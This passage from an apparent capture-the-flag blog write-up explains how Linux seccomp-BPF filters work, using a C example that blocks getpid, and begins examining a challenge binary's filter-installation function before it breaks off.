sock_fprog</code> holding the filter program.</p>\n<p>Reference: <a href=\"https://www.kernel.org/doc/html/v4.19/userspace-api/seccomp_filter.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp BPF (Secure Computing with Filters) — The Linux 
Kernel documentation</a></p>\n<p>Here is code that adds a filter to block <code class=\"language-text\">getpid</code>, similar to the previous example:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;errno.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stddef.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/audit.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/filter.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token 
string\">&lt;linux/unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/prctl.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/syscall.h></span></span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_filter</span> filter<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_fprog</span> prog <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token punctuation\">.</span>len <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">short</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">.</span>filter <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_NO_NEW_PRIVS<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token 
number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>prog<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"this process is %d\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The first code executed in <code class=\"language-text\">main</code> enables the <code class=\"language-text\">NO_NEW_PRIVS</code> flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_NO_NEW_PRIVS<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This prevents the process from escalating privileges after the filter is applied, and is required before the actual filter registration with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, 
&amp;prog)</code>.</p>\n<p>The flag is inherited across <code class=\"language-text\">execve</code> and can never be cleared again, so a filtered process cannot regain privileges by running a set-user-ID or file-capability binary. That is what stops an unprivileged filter from being used to alter the behaviour of a privileged program, and it is why the kernel insists on it.</p>\n<p>Note: unless the process has <code class=\"language-text\">CAP_SYS_ADMIN</code>, attempting to register the filter without this step fails with the following error:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ ./a.out\nprctl<span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">)</span>: Permission denied</code></pre></div>\n<p>The following section registers the filter with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &amp;prog)</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>prog<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The <code class=\"language-text\">sock_fprog</code> struct passed as the argument is defined as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre 
class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_filter</span> filter<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span 
class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_fprog</span> prog <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token punctuation\">.</span>len <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">short</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">(</span><span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">.</span>filter <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>The <code class=\"language-text\">BPF_STMT</code> and <code class=\"language-text\">BPF_JUMP</code> macros in the filter definition each emit one instruction of the BPF program that seccomp evaluates on every system call.</p>\n<p><code class=\"language-text\">BPF_STMT</code> emits a single non-branching instruction (a load or a return); <code class=\"language-text\">BPF_JUMP</code> emits a conditional branch whose last two arguments are the number of instructions to skip when the comparison is true and when it is false.</p>\n<p>For example, the first <code class=\"language-text\">BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch))</code> and <code class=\"language-text\">BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0)</code> load the <code class=\"language-text\">arch</code> field from <code class=\"language-text\">seccomp_data</code>, compare it with <code class=\"language-text\">AUDIT_ARCH_X86_64</code>, skip the next instruction if they match (jumping one ahead), and fall through to the immediately following instruction if they do not match.</p>\n<p>That immediately following instruction is <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL)</code>, which returns <code class=\"language-text\">SECCOMP_RET_KILL</code> and terminates the process.</p>\n<p>So the first three instructions check whether the runtime architecture is <code class=\"language-text\">AUDIT_ARCH_X86_64</code>, and terminate the process if it is 
not.</p>\n<p>The subsequent instructions load the system call number from <code class=\"language-text\">seccomp_data.nr</code> via <code class=\"language-text\">BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr))</code>, compare it with <code class=\"language-text\">__NR_getpid</code>, block the system call via <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM)</code> if they match, or allow it via <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)</code> if they do not.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span></code></pre></div>\n<p>In summary, this filter registers a rule that blocks the <code class=\"language-text\">getpid</code> system call.</p>\n<p>Compiling and running this code confirms that <code class=\"language-text\">getpid</code> fails, just as in the previous example.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/248c419ecc339298dac06e88a707aeac/105d8/image-20240620000934533.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 80.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/248c419ecc339298dac06e88a707aeac/8ac56/image-20240620000934533.webp 240w,\n/static/248c419ecc339298dac06e88a707aeac/d3be9/image-20240620000934533.webp 480w,\n/static/248c419ecc339298dac06e88a707aeac/e46b2/image-20240620000934533.webp 960w,\n/static/248c419ecc339298dac06e88a707aeac/446b5/image-20240620000934533.webp 1170w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/248c419ecc339298dac06e88a707aeac/8ff5a/image-20240620000934533.png 
240w,\n/static/248c419ecc339298dac06e88a707aeac/e85cb/image-20240620000934533.png 480w,\n/static/248c419ecc339298dac06e88a707aeac/d9199/image-20240620000934533.png 960w,\n/static/248c419ecc339298dac06e88a707aeac/105d8/image-20240620000934533.png 1170w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/248c419ecc339298dac06e88a707aeac/d9199/image-20240620000934533.png\"\n            alt=\"image-20240620000934533\"\n            title=\"image-20240620000934533\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"using-seccomp-tools\" style=\"position:relative;\"><a href=\"#using-seccomp-tools\" aria-label=\"using seccomp tools permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using seccomp-tools</h3>\n<p>The details of seccomp-bpf controls like this can also be inspected using seccomp-tools.</p>\n<p>Reference: <a href=\"https://github.com/david942j/seccomp-tools\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">david942j/seccomp-tools: Provide powerful tools for seccomp analysis</a></p>\n<p>Running the program compiled in the previous section produces the following output:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: 
auto; margin-right: auto; max-width: 831px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVQY022P2XKCQBBFAQ2LIrtBE4I4MzAY0WhWzf//18mEPMaHU93VXX3qtvXU58hjSVGFZPdr4uLBsGaRlYRpSRAVzJPl2PthRpTk5HlGUeSkWWpqQZzEJAbf97HEVtJstkipEKKhaWq0bum0YjYLmBuCwMOxLdy7CZOJg+P8YVnWfzpzLJXgcBzoe81+2HO5fnH5vlCuSoQUKLPf1BXLZUaaxkRRNCZ0Pfe2UIgtw2FPv9NoI70a2cfn+3hUVY/UokadFItkQTgPyc38ZrpfdN+hWmmEwyjcPe84nV94fTuzWq9oO/N+39IPGs/3mE6nuK6Lbds3hT/FpHwoxvUUcgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/99733e6675ed593eeb5da056216f03c0/8ac56/image-20240620001106792.webp 240w,\n/static/99733e6675ed593eeb5da056216f03c0/d3be9/image-20240620001106792.webp 480w,\n/static/99733e6675ed593eeb5da056216f03c0/6d405/image-20240620001106792.webp 831w\"\n              sizes=\"(max-width: 831px) 100vw, 831px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/99733e6675ed593eeb5da056216f03c0/8ff5a/image-20240620001106792.png 240w,\n/static/99733e6675ed593eeb5da056216f03c0/e85cb/image-20240620001106792.png 480w,\n/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png 831w\"\n            sizes=\"(max-width: 831px) 100vw, 831px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png\"\n            alt=\"image-20240620001106792\"\n            
title=\"image-20240620001106792\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This confirms the architecture and system call number validation, and the blocking of <code class=\"language-text\">getpid</code> — exactly as we determined from the filter implementation.</p>\n<h3 id=\"checking-the-challenge-binarys-seccomp-filter\" style=\"position:relative;\"><a href=\"#checking-the-challenge-binarys-seccomp-filter\" aria-label=\"checking the challenge binarys seccomp filter permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Checking the Challenge Binary’s seccomp Filter</h3>\n<p>Now let’s check the seccomp filter in the challenge binary.</p>\n<p>From the decompilation, this program first executes the following <code class=\"language-text\">install_seccomp</code> function:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  undefined2 local_18 <span class=\"token punctuation\">[</span><span class=\"token number\">4</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined1 <span class=\"token operator\">*</span>local_10<span class=\"token punctuation\">;</span>\n  \n  local_18<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">8</span><span class=\"token punctuation\">;</span>\n  local_10 <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">.</span><span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x26</span><span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x16</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>local_18<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><code class=\"language-text\">PR_SET_NO_NEW_PRIVS</code> is <code class=\"language-text\">0x26</code> (38), so <code class=\"language-text\">prctl(0x26,1,0,0,0)</code> is equivalent to <code class=\"language-text\">prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)</code>, which the kernel requires before an unprivileged process may install a seccomp filter.</p>\n<p>Likewise, <code class=\"language-text\">0x16</code> (22) is <code class=\"language-text\">PR_SET_SECCOMP</code> and <code class=\"language-text\">2</code> is <code 